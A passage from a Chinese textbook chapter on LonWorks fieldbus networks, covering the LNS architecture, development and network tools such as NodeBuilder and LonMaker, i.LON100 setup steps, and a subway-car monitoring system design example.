2.LNS构架LNS构架由一些硬件和软件组成。这里介绍LNS构架4个主要的组件:网络服务器(NetworkServiceServer,NSS)、网络服务接口(NetworkServicesInterface,NSI)、LCA对象服务器(LCAObjectServer)和LCA数据服务器(LCADataServer)。LNS组件构架LCA框图如图4⁃20所示。图4⁃20LNS组件构架LCA框图(1)网络服务器(NSS)NSS提供网络服务,它维护一个网络数据库并允许和协调多个客户节点访问服务器的服务和数据。当远程客户节点进行网络管理时,NSS必须在网络上,但当远程客户节点在进行检测和控制时,不需要NSS时刻在网络上,只是在第一次操作时需要NSS。NSS有两种实现方式,一种方式是NSS⁃10模块,是为了满足测控节点数据比较小的、嵌入式应用的需要而设计的。NSS⁃10模块包含管理和配置网络设置的资源,但是NSS⁃10模块的资源有限。另外一种方式是Windows方式的NSS,这里的NSS提供任何LonWorks网络资源的管理和配置信息的记录,而Windows方式下的NSS支持的网络节点个数和网络变量个数都比第一种方式大大增加了,因此它适合较大的系统,但它对系统的要求相当高。(2)网络服务接口(NSI)LNS的网络服务接口包含两部分:LNS网络接口硬件组件和LNS网络接口软件驱动。客户对服务器请求服务是通过网络设备接口NSI的硬件组件来完成的,而对于Windows方式下的NSS,实际上就是Windows平台的网络数据库和网络数据库管理引擎,NSI提供了网络信息和与NSS的物理上的连接。(3)LCA对象服务器(LCAObjectServer)LCA对象只有在Windows方式下的NSS才有,对象服务实际上是在NSS上加了一层外壳,其目的是为了方便Windows下的用户使用NSS,它除了提供绝大部分的NSS服务外,还包含基于PC的网络工具和组件应用。(4)LCA数据服务器(LCADataServer)LCA数据服务器提供一个高性能的监控网络数据的引擎,能够直接提供数据服务,并可访问网络变量和显式报文。4.6.3网络服务与LCA数据库1.网络服务LCA的对象服务和数据服务的主要目的是给用户提供一个非常简洁的访问网络服务器服务。网络服务根据功能可以分为以下三种类型:网络安装和配置、网络维护和修理以及系统监控。前面两种类型也可以称为网络管理,它主要是由LCA对象服务和NSS的组合来管理的,最后一个类型主要是由NSS支持下的LCA对象服务和网络服务进行管理的。(1)网络安装和配置与传统的控制网络相比,LonWorks总线中的网络节点除了需要物理的互连外,还需要通过一个安装工具动态地分配网络地址。在LNS中,NSS提供网络安装服务,将物理上互连的应用节点进行逻辑上的连接,也就是对节点分配逻辑地址———域、子网及所属的组;优先级设置,网络变量和显式报文的互联、信息发送方式:发送无响应、重复发送、发送应答和请求响应。NSS提供了三种安装方式:1)自动安装:任何一个应用设备在安装之前处于非配置状态,NSS能够自动搜寻这样的设备,并对其进行安装和配置。另外,它还能发现退出网络的设备,并相应地对网络进行重新配置。2)预安装:这种安装方式分两个步骤:首先是预定义阶段,在节点离线时,预定义系统所有应用节点的逻辑地址和配置信息;第二是发行阶段,在所有节点物理上都连接时,将所有的预定义信息下载到应用节点。3)NeuronID安装:可通过Servicepin按钮或手动的方式获取应用节点的NeuronID,通过NeuronID定位来设定应用节点的逻辑地址和配置参数。(2)网络维护和修理NSS提供的系统维护主要包括两个方面的服务:网络维护和网络修理。网络维护主要是在系统正常运行的状态下增加或删除应用节点,以及改变节点的网络变量的显式报文的连接。LonWorks网络的好处在于,一个节点的网络配置信息与应用程序是分离的。这样,可以对新节点进行任意添加,并且节点间的连接也可以动态地进行改变,而不需要改变节点的应用程序代码或改变物理接线。另外,网络维护还包括给节点增加新的应用程序软件。网络修理是一个错误设备的检测和替换过程。检测过程提供应用节点的测试结果或节点自身运行状态参数,查出设备出错是由于应用层的问题(例如,一个执行器由于电动机出错而不能开、关)还是通信层的问题(例如设备脱离网络)。由于采用动态分配网络地址的方式,使替换出错设备非常容易,只需要从数据库提取旧设备的配置信息下载到新设备即可,而网络上其他应用节点则不需要修改。(3)系统监控LCA数据服务提供系统范围内的监控服务,它可以查看网络上所有应用节点的信息管理,但在数据服务连接初始化时,需要NSS提供关于应用节点的配置信息和网络变量、显式报文等参数,一旦数据连接完成则不再需要NSS参与数据通信。图4⁃21LNS数据库结构框图2.LCA数据库为了提供前面所叙述的网络服务功能,NSS、对象服务和数据服务都需要维护一些数据库,并进行相应的数据库管理和访问优化等。LNS数据库结构如图4⁃21所示。对象服务维护LCA全局数据库(LCAGlobalData⁃base)和LCA网络数据库(LCANet⁃workDatabase),NSS维护NSS网络数据库(NSSNetworkDatabase)。下面介绍这三种数据库。1)LCA全局数据库。每一个LCA包含一个全局数据库,它是网络数据库的集合,定义每一个LCA网络的名称和网络文件的目录。2)LCA网络数据库。它是网络所有节点、路由器、域、子网、通道以及网络配置参数的集合,在网络数据库中有一个选项:LCA扩展数据库(LCAExtensionDatabase),用于LCA在Windows下的Plug⁃in技术的实现。3)NSS网络数据库。该数据库用于存储网络配置信息。在LNS网络中,多台PC运行LCA应用程序,其中一台PC运行LCA对象服务和NSS,称为NSSPC。NSSPC上运行的LCA程序称为本地程序,而其他的PC上运行的程序称为远程程序。NSSPC是唯一拥有NSS数据库和对象服务的PC,远程程序所有的网络服务都是通过自动地远程访问NSSPC上的数据库实现的。4.7LonWorks开发工具4.7.1节点开发工具专门为神经元芯片而设计的编程语言是以ANSIC为基础的NeuronC。NeuronC在ANSIC的基础上进行了扩展,删除了标准C中一些不需要的功能,如浮点运算、文件I/O等,支持神经元芯片的固化软件,并针对LonWorks环境增加了特定的对象集合及访问这些对象的内部资源,它是开发LonWorks应用程序的一个强有力的工具。为了使LonWorks总线的使用者快速方便地开发节点和联网,LonWorks技术中还包含了一系列的开发工具,包括基于节点的开发工具NodeBuilder和基于网络的开发工具LonBuilder,以及一系列的网络管理工具和LNS技术。1.LonBuilder开发工具LonBuilder开发系统功能齐全,集成了一整套开发LonWorks设备和系统的工具。这些工具包括:开发多个设备、系统应用程序的环境;安装配置设备的网络管理程序、检查网络流量以确定适当的网络容量和调试改正错误的协议分析仪。2.NodeBuilder开发工具NodeBuilder开发工具体积小巧、便于携带,和其他产品配合也可以完成完整的网络开发任务。NodeBuilder使用Windows开发环境为用户提供便于使用的联机帮助。NodeBuilder包括LonWorks向导软件工具,LonWorks向导是一套只需按几下鼠标就可生成一个互操作LonWorks设备的软件模板,可以大大节省编程时间。NodeBuilder3是目前最常用的开发LonWorks设备的第三代开发工具,是一个硬件和软件的平台。它包括一个基于Windows的软件开发系统和硬件开发平台用于设计和调试,另外还有相应的网络管理工具与它配套使用。(1)NodeBuilder3组件和主要特性NodeBuilder3主要含有以下组件:1)NodeBuilder自动编程向导:这个工具用来定义设备的外部接口并自动生成一些Neu⁃ronC的代码。其中第2版的NeuronC是一个高级的编程语言,它基于ANSIC又在此基础上做了扩展,以支持网络通信、硬件输入和输出接口以及事件驱动。第2版的NeuronC可生成符合LonMark标准的设备外部接口,这些自动生成的模板和代码为编程人员节省了大量的开发时间。2)NodeBuilder资源编辑器:这个工具用来观察和利用标准的数据类型和功能模式,并且用来定义特定的数据类型和功能模式。这些类型信息储存在LonMark资源文件中,可被资源编辑器、代码向导、NeuronC编译器、LonMark集成工具以及插件(Plug⁃in)向导使用,这使得所有的工具都具有统一的显示方式,从而减少了开发的时间。与LonMark标准兼容的设备需提供相应的资源文件。3)LNS设备插件(Plug⁃in)向导:这个工具可自动生成一个基于VisualBasic的应用,又称为设备插件,用于指导用户配置、浏览和检测、诊断由NodeBuilder开发工具所开发生成的设备。插件软件使硬件产品具有极大的实用性,NodeBuilder3工具包括软件测试、生成设备插件所需要的LNS的组件,该LNS插件可与任何支持LNSPlug⁃inAPI的LNS指导程序(Director)应用兼容。NodeBuilder3工具还包括其他一系列的产品,有LonMark集成工具、LNSDDE服务器软件、LTM⁃10A平台(硬件)和Gizmo4I/O板等。其中LTM⁃10A平台内部包含有一片神经元3150芯片,带有64KB内存、32KBRAM,输入时钟为10MHz。LTM⁃10A本身带有电源、应用I/O或主机接口连接器以及一个收发器。Gizmo4可提供I/O,用于开发、测试和学习,它把神经元芯片的11个I/O引脚预先连接到外围电路上,还带有服务引脚和复位按钮。Gizmo4带有的PIC微控制器接口可用于ShortStack样板应用,利用TP/FT⁃10F内存控制模块插座,允许将Gizmo4用作独立的设备。Gizmo4外围电路包括蜂鸣器、LED、按钮、LCD显示、A⁃D转换、D⁃A转换、温度传感器、转轴(正交)编码器、定制外围设备的样机区域及实时时钟。(2)PC的网络接口选项当使用NodeBuilder1.5时,作为网络管理工具的计算机必须能和目前设备通信,当使用NodeBuilder3时,作为网络管理工具的计算机可以选择是否要和目前接口设备通信,若选择不与网络接口通信时,必须存在已经建立的LonWorks网络,即对新安装的NodeBuilder使用时,在LNS数据库中要有可供选择的网络数据,此时可使用任何的LNS兼容网络接口,主要包括PCLTA⁃10网络接口、PCLTA⁃20/21网络接口、PCC⁃10网络接口、i.LON10、i.LON100、i.LON600、Internet服务器以及USBU⁃10接口、U⁃20接口等。其中,PCLTA⁃10网络接口可插入台式PC的ISA总线插槽,PCLTA⁃20/21网络接口可插入台式PC的PCI总线插槽,PCC⁃10网络接口可插入便携式PC的PC卡槽,i.LON10、i.LON100和i.LON600提供通过IP的远程网络连接。此外,i.LON100还有I/O和Web服务器功能,U⁃10和U⁃20则是体积小巧的USB接口,其中U⁃10为双绞线接口,U⁃20为电力线接口。4.7.2网络工具网络工具软件用于网络设计、安装、配置、监视、监督控制、诊断和维护,主要是以下工具软件的结合:1)网络集成工具:提供设计、配置、测试和维护网络的基本功能。2)网络诊断工具:用于观察、分析和诊断网络流通状态,并监视网络的负载情况。3)HMI开发工具:用来创建人⁃机接口(HMI)应用程序。4)I/O服务器:用来为HMI应用程序提供对LonWorks网络的访问功能。网络工具基于LNS网络操作系统,具有互操作性,即这些工具软件可在同一时刻在同一网络上运行。1.LNSDDE服务器LNSDDE服务器是一个很好的软件包,它允许任何与DDE相兼容的MicrosoftWindows应用程序监视和控制LonWorks网络而无须编程。用于LNSDDE服务器的典型的应用程序包括人机界面应用程序、数据记录和趋势分析应用程序以及图像处理显示接口。LNS是一个LonWorks网络的开放的、标准的操作系统,它以强大的客户/服务器体系结构为基础,允许多个安装人员或者维护人员同时访问和修改一个公共数据库。通过建立LNS和MicrosoftDDE协议的连接,与DDE相兼容的Windows应用程序可以使用以下方法和Lon⁃Works设备进行交互操作:1)读、监视和修改任何网络变量的值。2)监视和改变配置属性。3)接收和发送应用程序报文。4)测试(Test)、启用(Enable)、禁用(Disable)以及强制(Override)LonMaker对象。5)测试、闪烁(Wink)以及控制设备。LNSDDE服务器把LonWorks网络连接到楼宇、工厂处理装置、半导体制造和其他工业、商业应用的控制系统的操作界面。在上百种DDE应用程序中,可以和WonderwareInTouch、IntellutioniFix、USDATAFactoryLink、NationalInstruments的LabView、BridgeView、MicrosoftExcel、MicrosoftVisualBasic等相兼容。LNSDDE服务器支持Wonderware公司的FastDDE协议,以提高和InTouch一起使用的性能。一旦网络经由LonMakerforWindows配置完毕投入使用,LNSDDE服务器即可自动访问由LonMaker工具自动创建的LNS数据库,LNS能够确保所需的信息能够在LNS数据库中自动生成,而无须额外的配置步骤。2.LonScanner协议分析软件LonScanner协议分析软件为LonWorks产品制造商、系统集成商和最终用户提供一个简单易用的、基于Windows操作系统的工具,使用户可以观察、分析和诊断所安装的Lon⁃Works网络的行为。这个工具所提供的先进的功能在数据网络分析中起着重要的作用,适合控制网络的独特需求。协议分析软件通过数据采集、定时标记等手段将所有通信数据存储到日志文件中来简化网络的维护。多个日志和网络接口设备能够同时被激活,这使得从一个多信道的网络中或者从多个网络中采集数据包变得简单,其事务分析系统(TransactionAnalysisSystem)能够检查每一个采集到的与之相关的数据包,以帮助用户了解和解释网络的通信流量。其特点如下:1)捕获、分析、描绘和显示一个信道上所有的ANSI/EIA709.1数据包,用于网络活动和通道流量的详细分析。2)支持大多数通用的709.1网络接口设备,包括Echelon公司的U10/U20USB网络接口设备、PCC⁃10PC卡网络接口、PCLTA⁃21网络接口、i.LON100互联网服务器以及i.LON600LonWorks/IP服务器。3)当配合LNSTurboRuntime一起使用时,可以监视IP⁃852信道。4)当配合i.LON100和i.LON600一起使用时,可以监视本地或者远程网络。5)能够运行在Windows7、WindowsXP、WindowsServer2003和Windows2000平台上。6)能够和基于LNS的应用程序(如LonMaker工具)共享同一个网络接口设备。7)能够解释数据包的内容,而无须解释原始的十六进制数据。8)简单的数据包记录功能配合事务分析系统,能够解释所有与之相关的数据包。9)提供数据包接收过滤器以减少被记录的数据包数量,从而帮助用户找到与之相关的数据包。10)能够显示设备和网络变量名,包括基于用户自定义的网络地址或者基于来自任何LNS网络数据库(可以是由LonMaker集成工具生成的数据库)的名称。11)基于LonMark资源文件的网络变量数据编排格式,能够简化数据的解释。12)能够显示整个网络统计数据,从而对网络的状况进行详细的分析。13)能够在长期趋势曲线图中显示网络负载或出错率数据,从而很容易地辨别额外的网络通信量和错误信息。14)能够同时监视多个信道和网络。除由Echelon公司推出的LonScan协议分析软件外,还有由LOYTEC公司推出的硬件工具LPA网络协议分析仪,用于网络协议分析、诊断和组建高性能网络架构等。4.7.3LonMaker和i.LON1001.LonMakerLonMakerforWindows集成工具是一个用于设计、安装和维护多设备供应商的、开放的、互操作性的LonWorks控制网络的软件包,它为PC提供了网络管理工具,可用于应用程序代码下载、设备安装、网络变量连接、报文标记、基本的网络诊断和控制等。LonMaker工具基于LNS网络操作系统,包含功能强大的客户服务器体系结构以及简单易用的Visio用户界面。这个工具可用来设计、启动和维护分布式的控制网络,也可用作网络维护工具。LonMaker工具遵循了LNS插件标准,该标准允许LonWorks设备制造商为他们的产品提供自定义的应用,当LonMaker用户选择相连的设备时,这些自定义的应用会自动启动,可以使系统工程师和技术员非常方便地定义、测试和维护相关设备。对于实际工程系统而言,网络设计也可以在工程现场进行,如果将LonMaker工具连接到一个已交付使用的网络上,网络设计也可以在工程现场进行。这个特点非常好地满足了小型网络设计的要求,同时对于需要增加、移除和修改网络设备的场合也可提供方便。LonMaker工具可为用户提供友好的操作环境界面和灵活的绘画功能,使得设备的创建非常方便。LonMaker工具含有一系列的用于LonWorks网络设计的设备图形模板,用户也可以创建自己的图形。用户创建的图形可以是一台单独的设备或者功能块,也可以是一个复杂的、完整的系统,系统中含有预先定义好的设备、功能块和这些设备、功能块之间的连接关系。利用定制子系统图形(CustomSubsystemShapes),用户只需要简单地将图形拖到一个新的绘图页面上就可创建子系统,这样就可大大减少复杂系统设计所需要的时间。利用LonMaker提供的网络安装功能,可以在同一时间让多台设备投入使用。可以通过多种方式识别所安装的设备,包括服务引脚、条形码扫描神经元芯片ID号或手动输入ID号等。LonMaker工具是一种扩展的工具,在网络的整个生命周期都可利用它来简化网络安装任务。(1)LonMaker所含组件其所含组件主要有:1)LonMaker光盘。该光盘包括LNS服务器的LonMaker软件、LonPoint插件和应用、Visio专业版或2002标准版、LNS驱动以及AdobeAcrobat阅读器。集成安装程序简化了所有软件的安装。2)LonMaker用户指南。学习如何安装和使用LonMaker工具。安装LonMaker工具的其他资料在联机帮助文件中,可在相关网址(http://www.echelon.com/lonmaker)中找到其更新资料。(2)硬件要求LonMaker集成工具对计算机硬件要求如下。如果要设计一个两百到成千上万个设备的网络,则要参见LNS服务器和运行LonMaker工具的计算机的附加建议,该建议在组建大型网络描述中。1)组建小网络。当组建的网络比较小时,LonMaker集成工具对硬件的要求如下:①操作系统可以是Windows7、WindowsXP、Windows2000或者Windows98,这里以Windows7为例。②至少350MB的硬盘空间。③PentiumⅢ、Pentium4或者更快的CPU。④内存至少512MB。⑤CDROM驱动。⑥超级VGA(800×600像素)或256色的高分辨率显示。⑦鼠标或其他相兼容的点击设备。所需的存储器同时受插件数量、LNS应用及其他正在运行的Windows应用的影响。如果同时运行多个插件或应用程序,则至少需要512MB的空间。为了节省LonMaker备份文件,推荐使用一个100MB或更大的可移动存储介质驱动器,如ZIP磁盘或远程文件服务器。2)组建大型网络。组建大型网络时,高性能的硬件是必不可少的。LNS服务器磁盘的持续传输速率应该大于20Mbit/s,平均寻道时间应该小于8ms。该传输速率满足使用SATA、UltraATA/100、超SCSI以及更快接口的SCSI驱动。通过使用诸如RAID5磁盘阵列的冗余磁盘配置,可以进一步提高网络性能和可靠性。对于大型网络,安装LonMaker工具时,WindowsXP和Windows2003系统至少应该有2GHz的Pentium4,Windows2000至少有1GB的内存和1500MB的页面文件,必要时还要增加虚拟内存。速度、操作系统和内存大小在调试网络时不那么重要,调试设备时,至少512MB内存的小型笔记本式计算机运行就很好。(3)LonMaker的安装LonMaker工具的每个许可副本最多允许安装在两台设备上,通常主安装是在台式计算机上,复制在笔记本式计算机上。二次复制必须为主用户独家使用;LonMaker软件一次只能在一台计算机上使用,另一台计算机不能管理或恢复LonWorks设备。安装时要遵循以下步骤:1)如果事先装有LonMaker试用版,要替换为完整版,必须先卸载Visio试用软件。若不卸载Visio,那么LonMaker软件可以安装,但Visio的完整版无法安装。2)如果要安装LonMaker试用版,而事先安装了LonMaker零售版或Visio2002,则在安装试用版之前要卸载它们,并重启计算机。3)关闭所有正在运行的Windows程序。如果正在运行任何16位的程序(包括后台程序),则LonMaker软件可能无法正确安装。4)要禁用任何LonWorks服务。5)将LonMaker光盘插到CD⁃ROM驱动器中。6)在“SelectComponents”对话框上勾选适当的复选框,选择想要安装的组件。①MicrosoftVisio。如果已经安装了Visio软件,则同样可以从LonMakerCD上安装Visio,如果没有安装,则必须选择安装。②LonMakerIntegrationTool:安装LonMaker工具将自动安装LNSTurboEdition网络操作系统及以下网络接口的驱动程序:i.LON10以太网适配器、i.LON100Internet服务器和i.LON600LonWorks/IP服务器;U10/U20USB网络接口;PCC⁃10、PCLTA⁃10、PCLTA⁃20和PCLTA⁃21PCI网络接口。由于展板使用的是LonPoint模块,因此在安装LonMaker时必须安装LonPointPlug⁃in。③Drivers。当使用LonWorks信道时,LonMaker工具需要使用LNS网络接口,例如i.LON10、i.LON100、PCLTA⁃10、PCLTA⁃20、PCC⁃10、PCNSI、SLTA⁃10或者PL⁃SLTA。如果用户使用PCLTA⁃10、PCLTA⁃20或者PCC⁃10,则勾选PCLTA⁃10/PCC⁃10/PCLTA⁃20复选框;如果使用PCNSI,则勾选PCNSI复选框;如果使用SLTA⁃10,则勾选SLTA⁃10复选框。如果用户使用的是IP网络接口,则不要选择任何的LNS网络驱动(这里由于使用的网络接口是i.LON100,则不选择以上各选项框)。④AdobeAcrobatReader。AdobeAcrobatReader是一个免费软件,可以阅读PDF文件,多数LonMark参考文档是PDF,如果已经安装了AdobeAcrobatReader软件,则不选AdobeAcrobatReader复选框,否则要选择该复选框。单击“Install”按钮,安装程序会根据选择的组件顺序进行安装(MicrosoftVisio和Lon⁃Maker的序列号都在盘中的SN文件里)。7)如果安装的是LonMaker工具的试用版,则在使用LonMaker工具之前,必须先激活Visio。(4)LonMaker设计管理器概述LonMaker设计管理器允许创建、打开、备份、恢复、整理和删除LonMaker网络,也可以设置资源文件语言和选择新的网络安装模板。打开Lon⁃Maker设计管理器,需单击Windows开始菜单,选择“Programs”→“EchelonLonMakerforWindows”→“LonMakerforWindows”。LonMaker设计管理器的选项卡允许设置一个LonMark资源文件的语言优先级列表和选择新网络的LonMaker模板。当LonMaker工具显示所选设备、功能块和网络变量的文档时,它要使用包含在Lon⁃Mark资源文件中的定义。通过指定LonMaker工具中的LonMark资源文件语言优先级列表,可以用不同的语言显示LonMark资源文件信息。在“网络性能”中,可以通过选择资源文件语言标签为特定网络设置资源文件语言。可在LonMaker设计管理器中选择“Options”选项卡全局性地为新网络设置资源文件语言,如图4⁃24所示。2.i.LON100(1)i.LON100服务器所含组件其所含组件主要包括:1)i.LON100设备。有八种型号的i.LON100因特网服务器,内置TP/FT⁃10自由拓扑双绞线和PL⁃20电源线两个版本;版本可带也可不带内置模拟调制解调器及IP⁃852使能路由;对还没有IP⁃852使能路由的i.LON100e3服务器,需购买IP⁃852激活密钥。如i.LON100e3硬件指导所述,每个模型的输入输出略有不同。2)i.LON100快速启动指导。该文件描述如何连接i.LON100硬件以及如何使用i.LON100网页配置i.LON100的IP信息。3)i.LON100光盘。光盘内包含i.LON100服务器的安装软件以及LNS3服务包7、更新1和LonMaker3.1服务包2、更新1的安装软件。(2)硬件要求运行i.LON100软件的硬件要求与建议如下:1)PentiumⅡ600MHz或者更快的CPU。2)内存至少128MB。3)70MB空闲硬盘空间。4)CDROM驱动。5)超级VGA(800×600像素)或256色的高分辨率显示。6)鼠标或其他相兼容的点击设备。(3)软件要求运行i.LON100的软件要求与建议如下:1)操作系统可以是MicrosoftWindowsXP、Windows2000或者Windows2003,Echelon推荐安装微软最新版本的Windows服务包;大字体或小字体的屏幕分辨率为1024×768像素,小字体屏幕分辨率为800×600像素。2)相应软件为LonMaker3.2、服务包2或更高版本,LNS3.1、服务包8、更新1或更高版本上。3)IE浏览器6或更高版本。4)终端仿真程序,如Windows超级终端。(4)i.LON100服务器的使用步骤其使用步骤如下:1)安装i.LON100软件,设置初始值,配置i.LON100网络服务器。2)开始访问i.LON100网页或i.LON100配置插件,配置i.LON100应用。3)利用已创建的i.LON100服务器,为要使用的应用创建数据点。4)配置要使用的应用程序。5)创建用于监视和控制设备的自定义Web页面。(5)i.LON100软件安装使用i.LON100配置插件之前,要安装i.LON100软件,安装时遵循以下步骤。注意要用IE浏览器6或更高的版本访问i.LON100网页。1)如果使用的是LNS应用,要确认是LNS3、服务包8、更新1或更高版本。如果使用的是LonMaker集成工具,要确认是LonMaker3.1、服务包3、更新3(或更高版本)。这些补丁均在i.LON100光盘中。如果安装的LonMaker工具版本低于3.1,首先要将其更新至3.1版。LNS和LonMaker工具的最新服务包可在相关网址(www.echelon.com/downloads)中下载。最后,单击LonMaker设计管理器的标题栏并选择“AboutEchelonLonMaker”,确认安装的所有软件的版本都要正确。2)确认计算机上安装了IE浏览器6、服务包1(或更高版本)。可根据以下步骤3和步骤4安装IE浏览器6、服务包1。3)插入i.LON100e3光盘,会出现i.LON100e3窗口,如果没有出现,打开i.LON100e3的根目录并双击“Setup.exe”。4)单击“InstallProducts”按钮,打开产品安装窗口,如图4⁃26所示。5)安装i.LON100e3软件。选择“Echeloni.LON100e3Software”,按照屏幕上的安装提示安装i.LON100e3软件。6)如果要用i.LONVision软件为i.LON100e3服务器创建自定义网页,还需要在计算机上安装MacromediaContribute3.1软件。可以选择“MacromediaContribute3.1TrialVer⁃sion”安装软件的试用版。然后,选择“Echeloni.LONVisionSoftware”,按照指示完成安装。注意,MacromediaContribute3.1软件要在i.LONVision之前安装。如果是从另一个来源获取MacromediaContribute软件,可以稍后安装i.LONVision软件。(6)连接和配置i.LON100网络服务器安装完i.LON100软件后,接下来可将其连接到i.LON100服务器上并执行一些初始配置任务。按以下步骤进行:1)根据i.LONe2硬件指南,组装i.LON100服务器。2)如果要升级i.LON100服务器运行的i.LON100软件早期版本,用升级向导升级i.LON100服务器固件。升级之后就可以使用e3新网页和插件。3)如果当前计算机与i.LON100服务器没有在同一子网上(默认192.168.1.x),则要打开Windows命令提示符,在进入欢迎页面之前发布以下命令(把“192.168.1”变为合适的子网前缀):“routeadd192.168.1.0mask255.255.255.0&computername&”。4)打开电脑安装IE浏览器6,进入i.LON100服务器地址。默认地址是http://192.168.1.222,如果升级了现有i.LON100服务器,地址有可能改变。5)用“Network⁃LAN/WAN”网页建立i.LON100服务器的连接和服务。6)如果i.LON100服务器配有调制解调器,用“Configure⁃Modem”网页设置调制解调器。7)用“Network⁃LONWORKS”网页为i.LON100服务器配置LonWorks环境。如果计划使用i.LON100服务器作为本原接口把LNS或基于OpenLDV的应用连接到LonWorks网络的话,就需要配置环境。也可以利用该网页配置NVE驱动,NVE驱动负责管理网络上的NVE(外部)数据点。NVE数据点是网络上其他设备的数据点,i.LON100服务器可以使用它来监视这些设备。8)如果计划把i.LON100服务器作为IP⁃852通道上的路由器使用,就要启动路由器选项,配置i.LON100服务器的IP⁃852路由环境。9)配置i.LON100服务器的时间设定。10)用“Network⁃M⁃Bus”和“Network⁃Modbus”网页分别配置M⁃bus与Modbus驱动。11)在i.LON100服务器上执行安全访问重置,设置i.LON100服务器的安全选项。12)重启i.LON100服务器。指向“Setup”,然后单击菜单上的“Reboot”按钮,打开“Setup⁃Reboot”网页。一旦i.LON100服务器重新启动,所有的设置都会生效4.8LonWorks地铁车辆监控应用实例4.8.1系统概述与总体框架1.系统概述随着我国城市化进程的快速发展,城市交通拥堵日益严重,发展运量大、节能环保和快速安全的城市轨道交通体系已经迫在眉睫。城市轨道车辆各节车厢的运行状态和故障信息通过分布在现场的智能设备进行采集,应用现场总线技术将采集到的数据集中显示,从而保证轨道车辆高速、安全、稳定运行。LonWorks网络地铁车厢监控系统组成如图4⁃27所示。系统采用LonWorks作为地铁车辆总线,实现各节车厢之间的数据传输。一级网络是整体地铁总线,可以实现对整体车厢的统一控制,二级网络是车厢级的LonWorks总线及车厢级应用节点。每一节车厢的控制单元为地铁车辆总线上的一个控制节点,通过EIA⁃485将分布在各节车厢的车门控制器、空调控制器、供电监控器的数据通过LonWorks网络传输给主处理板,各车厢的主处理板通过LON网关与车辆总线通信,从而实现整车的联网功能。(1)列车主控计算机列车主控计算机采用带有EIA⁃485通信接口的薄型触摸屏工控机,主控计算机是地铁车辆监控系统的核心,负责接收各种数据指令并自动执行相应的操作步骤,显示并记录各节车厢的运行状态,对运行过程中出现的故障及时进行诊断、显示并报警。主控计算机的控制软件使用VisualStudio开发,地铁“车厢控制单元”界面如图4⁃28所示,可以以数字、指示灯和数字仪表的形式选择性地显示全车车厢和每节车厢的车厢号、车门开关情况、车厢温度和通电照明情况,界面简洁直观、操作方便。(2)代理节点代理节点是连接地铁车辆网和车厢网的桥梁,一般分为车厢网络和整车网络两层,有两个独立的LonWorks通信接口。上行LonWorks通信接口负责列车级网络通信,接收并将车辆主机的信息转发给下行LonWorks通信模块。下行LonWorks通信接口负责车厢级网络通信,转发集中控制命令,接收各车厢应用节点传输的参数、工作状态等信息。(3)电源供电和照明控制功能为了保证供电的可靠性,地铁车辆的供电系统分为两路,在正常运行情况下,一路给奇数号车厢供电,另一路给偶数号车厢供电。一旦某一路发生故障,供电转换器自动转换为正常一路供电,同时车上的所有负载会减半运行并报告故障。故障解决后,供电转换器又会自动切换到正常情况下的供电状态。为了节约电能,在保证乘客视觉舒适性的条件下,地铁车厢的照明分为“半灯”“全灯”和“停止”三种状态。照明系统利用光强度传感器采集车厢内的亮度,将光信号转换为电信号,通过主控制器来调节照明状态。2.总体框架适配器主要由LonWorks控制模块、协议转换和EIA⁃485通信模块构成,其中Lon⁃Works控制模块用于LonWorks现场总线的网络通信管理,主CPU89C52加上EIA⁃485通信模块来实现通信协议的转换和EIA⁃485的通信。网关功能利用神经元芯片实现。工作原理:Neuron芯片选用从A操作方式,即在主处理器的控制下工作,在通信前,89C52和Neuron芯片之间建立握手信号,即HS信号有效,然后主机再发送CMD_RESYNC,表示要求Neuron芯片同步,而Neuron芯片接到芯片信号后,则发送CMD_ACKSYNC,表明已经同步可以通信,这时虚拟令牌就可以在主机与芯片之间无限制地交替传递。4.8.2处理器STC89C52与外围电路设计1.主处理器STC89C52主处理器选用由宏晶公司推出的兼容性较好的STC89C52小型单片机。STC89C52是自动化领域常用的器件,它是一种低功耗、高性能CMOS8位微处理器,具有8KB系统可编程Flash存储器,在原有MCS⁃51内核上做了很多改进,使得芯片具有传统51单片机不具备的功能。主要特性如下:(1)8KB程序存储空间。(2)512B数据存储空间。(3)内带4KBEEPROM存储空间。(4)可直接使用串口下载用户程序。2.DS18B20数字温度传感器车厢温度控制采用DS18B20数字温度传感器,其接线方便、体积小,可以根据应用场合的不同而封装成不同的外部形状,如管道式、螺纹式和磁铁吸附式等,如图4⁃31所示。DS18B20独特的单线接口方式使得其只需要一条数据口线就可以与微处理器STC89C52实现双向通信,不需要其他外围元件。DS18B20还支持多点组网功能,在保证电源电压供电正常的情况下,唯一的三线上可以并联多个DS18B20传感器,实现多点测温,在-10~+85℃的温度范围内,精度可达±0.5℃,可以精确地控制车厢温度,保证乘客的舒适性。3.EIA⁃485通信模块EIA⁃485通信模块的主要功能是实现通信协议的转换和EIA⁃485的通信,可采用MAX485芯片,它所构成的485总线采用的是半双工的工作方式,数据最高传输速率为10Mbit/s,接口采用平衡驱动器与差分接收器的组合,抗共模干扰能力强,即抗噪声干扰性强。EIA⁃485接口的最大传输距离标准值为4000ft(1ft=0.3048m),实际上可达1219m,在总线上允许连接多达128个收发器,即具有多站能力。4.8.3神经元芯片和收发器的选择1.神经元3150芯片神经元3150芯片作为一种多处理器结构的神经元芯片,有着完整的系统资源,集成了三个管线CPU,最高工作频率可达10MHz。它配备有11个编程输入、输出引脚(IO1~IO10),编程方法多达34种,应用方便。芯片内设有EEPROM和RAM,支持外部扩展多种存储器的接口,最大存储空间可达64KB。Neuron芯片的优势在于它的网络通信功能,引出的5个通信引脚(CP0~CP4)提供了单端、差分和特殊应用模式等三种网络通信方式。2.收发器的选择与电路设计FFT⁃10A收发器主要由一个隔离变压器和一个差分曼彻斯特编码器组成,NET_A、NET_B是两个网络接口,此接口没有极性要求。RXD、TXD分别是数据接收和发送端口,CLK为收发器时钟输入端,T1、T2则用来提供钳位和瞬时电压保护。收发器所带的变压器隔离接口可满足系统高性能、高共模隔离的要求,同时具有隔离噪声作用,可防止干扰信号进入传输网络中,它支持无极性自由拓扑结构,从而可使系统安装不再局限于总线结构,也就是说,此收发器支持星形、环形接线(自由拓扑结构通过最简单的接线方式减少了系统安装的时间和费用,从而可使任务以最快的方式完成)。由于减少了对通信线的拓扑、接合和节点位置的限制,因而使得网络更易于扩展。两个FFT⁃10A收发器还可以背靠背用作数字式重复器,同时可在一个信道上增加传输距离或节点数量。3.实例总结在上述案例中,每节车厢的主处理器和LON网络适配器的组合就相当于LonWorks列车总线的一个智能节点,并且是基于主机的现场控制节点。主处理器通过LON网络适配器完成与列车总线的通信,而主处理器与网络控制器之间的通信依靠EIA⁃485完成。主处理器将从各个子系统收